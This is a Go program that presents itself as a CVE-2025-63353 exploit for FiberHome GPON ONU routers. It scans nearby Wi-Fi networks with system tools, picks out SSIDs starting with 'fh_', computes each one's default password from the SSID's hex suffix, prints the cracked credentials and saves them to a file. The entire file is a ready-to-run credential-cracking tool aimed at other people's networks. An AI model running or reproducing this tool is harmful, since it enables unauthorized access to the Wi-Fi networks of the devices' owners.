package main

import (
	"fmt"
	"os"
	"os/exec"
	"strconv"
	"strings"
	"time"
)

func scanWiFi() ([]string, error) {
	var cmd *exec.Cmd

	if _, err := exec.LookPath("nmcli"); err == nil {
		cmd = exec.Command("nmcli", "-t", "-f", "SSID", "dev", "wifi")
	} else if _, err := exec.LookPath("netsh"); err == nil {
		cmd = exec.Command("netsh", "wlan", "show", "networks")
	} else if _, err := exec.LookPath("airport"); err == nil {
		cmd = exec.Command("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport", "-s")
	} else {
		return nil, fmt.Errorf("no WiFi scanner available")
	}

	output, err := cmd.Output()
	if err != nil {
		return nil, err
	}

	return parseNetworks(string(output)), nil
}

func parseNetworks(output string) []string {
	var networks []string
	seen := make(map[string]bool)

	for line := range strings.SplitSeq(output, "\n") {
		line = strings.TrimSpace(line)
		if line == "" || strings.Contains(line, "BSSID") || strings.Contains(line, "SSID") {
			continue
		}

		ssid := extractSSID(line)
		if ssid != "" && !seen[ssid] {
			seen[ssid] = true
			networks = append(networks, ssid)
		}
	}
	return networks
}

func extractSSID(line string) string {
	// netsh: "SSID 1 : NetworkName"
	if strings.Contains(line, "SSID") && strings.Contains(line, ":") {
		parts := strings.Split(line, ":")
		if len(parts) >= 2 {
			ssid := strings.TrimSpace(parts[1])
			if ssid != "" && ssid != "--" {
				return ssid
			}
		}
		return ""
	}

	// airport/nmcli: SSID as first field
	fields := strings.Fields(line)
	if len(fields) > 0 {
		return fields[0]
	}
	return ""
}

func calculatePassword(ssid string) (string, error) {
	hexA := strings.TrimPrefix(ssid, "fh_")
	hexA = strings.TrimSuffix(hexA, "_5G")

	if len(hexA) != 6 {
		return "", fmt.Errorf("invalid hex length: %d", len(hexA))
	}

	hexAVal, err := strconv.ParseInt(hexA, 16, 32)
	if err != nil {
		return "", fmt.Errorf("invalid hex: %s", hexA)
	}

	hexB := 0xFFFFFF - int(hexAVal)
	return fmt.Sprintf("wlan%06x | wlan%06X", hexB, hexB), nil
}

func saveResults(results []string) error {
	file, err := os.Create("passwords")
	if err != nil {
		return err
	}
	defer file.Close()

	fmt.Fprintf(file, "# CVE-2025-63353 Exploit Results\n")
	fmt.Fprintf(file, "# Generated: %s\n", time.Now().Format("2006-01-02 15:04:05"))
	fmt.Fprintf(file, "# Total vulnerable: %d\n\n", len(results))

	for _, line := range results {
		fmt.Fprintln(file, line)
	}
	return nil
}

func main() {
	fmt.Println("[*] CVE-2025-63353 Scanner - FiberHome GPON ONU")
	fmt.Println(strings.Repeat("=", 60))

	start := time.Now()
	networks, err := scanWiFi()
	if err != nil {
		fmt.Printf("[-] Scan failed: %v\n", err)
		return
	}

	fmt.Printf("[*] Found %d networks (%.2fs)\n", len(networks), time.Since(start).Seconds())

	var results []string
	vulnerable := 0

	for _, ssid := range networks {
		if !strings.HasPrefix(ssid, "fh_") {
			continue
		}

		vulnerable++
		password, err := calculatePassword(ssid)
		if err != nil {
			fmt.Printf("[!] %s - %v\n", ssid, err)
			continue
		}

		fmt.Printf("[+] %s:%s\n", ssid, password)
		results = append(results, fmt.Sprintf("%s:%s", ssid, password))
	}

	if len(results) > 0 {
		if err := saveResults(results); err != nil {
			fmt.Printf("[ERR] Save failed: %v\n", err)
		} else {
			fmt.Printf("[*] Saved %d credentials to 'passwords'\n", len(results))
		}
	}

	fmt.Println(strings.Repeat("=", 60))
	fmt.Printf("[*] Scanned: %d | Vulnerable: %d | Cracked: %d\n",
		len(networks), vulnerable, len(results))
}
